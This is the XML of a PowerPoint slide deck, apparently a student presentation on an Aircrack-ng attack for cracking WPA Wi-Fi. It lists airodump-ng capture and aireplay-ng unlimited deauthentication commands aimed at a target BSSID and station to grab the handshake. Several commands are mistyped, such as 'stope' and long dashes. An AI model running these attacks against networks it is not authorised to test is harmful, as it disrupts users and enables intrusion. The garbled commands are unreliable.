            <a:ext cx="9772650" cy="36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DCF1-0879-48E9-AA2E-EE58E31F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11" y="764928"/>
            <a:ext cx="8596668" cy="159326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Airdump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-ng –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>channelNo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> –w capture –d BSSID wlan0mon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        &gt; Set the channel no to entering the network </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        &gt; Capture the BSSID </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>        &gt; Capture the Handshake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A25B9-9DBE-4FE4-8DD8-A5DE99ED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42" y="406527"/>
            <a:ext cx="6384758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855DA-76AA-4438-B5E2-EC1489C29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3819525"/>
            <a:ext cx="9239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1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E185-F7C2-4908-B363-A86874B5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03" y="652631"/>
            <a:ext cx="8596668" cy="2074527"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Aireplay</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-ng –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>deauth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 0 –a BSSID –c STATION wlan0mon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>       &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>deauth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> pack at unlimited rate. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>       &gt; broadcast authentication packs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>       &gt; choose the particular station to get the network.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>       &gt; catch the WPA handshake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CB98A-7CAA-4FFE-B092-89CAA6CF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464968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D00AF-1C41-4ECB-B462-FB35DA71D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8" y="3429000"/>
            <a:ext cx="557087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37CD-4CAB-46EC-B665-BDF6F587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540336"/>
            <a:ext cx="8596668" cy="3880773"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ls </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>       &gt; choose the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>capture.cap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> file and open it with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>wireshark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A73D4-7BCC-497B-B9B9-CFE91EEC9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6" y="1561348"/>
            <a:ext cx="9145664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A4D7D-3374-4B60-906D-40B10496E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3192379"/>
            <a:ext cx="9210675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518-5D03-405B-948D-8BFA2467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0337"/>
            <a:ext cx="8596668" cy="1865980"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Airmon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-ng stope wlan0mon </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>      &gt; Stop the monitor mode and go back to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>wifi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>-managed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C25E-037E-482B-BA77-477F117A5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78" y="1622009"/>
            <a:ext cx="9161044" cy="43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6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92</TotalTime>
  <Words>252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 Presentation on Aircrack-ng Attack</vt:lpstr>
      <vt:lpstr>Introduction</vt:lpstr>
      <vt:lpstr>Cracking WPA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Mahadi Hasan</dc:creator>
  <cp:lastModifiedBy>Mahadi Hasan</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2022-04-28T09:18:34Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-04-28T15:16:28Z</dcterms:modified>
</cp:coreProperties>
</file>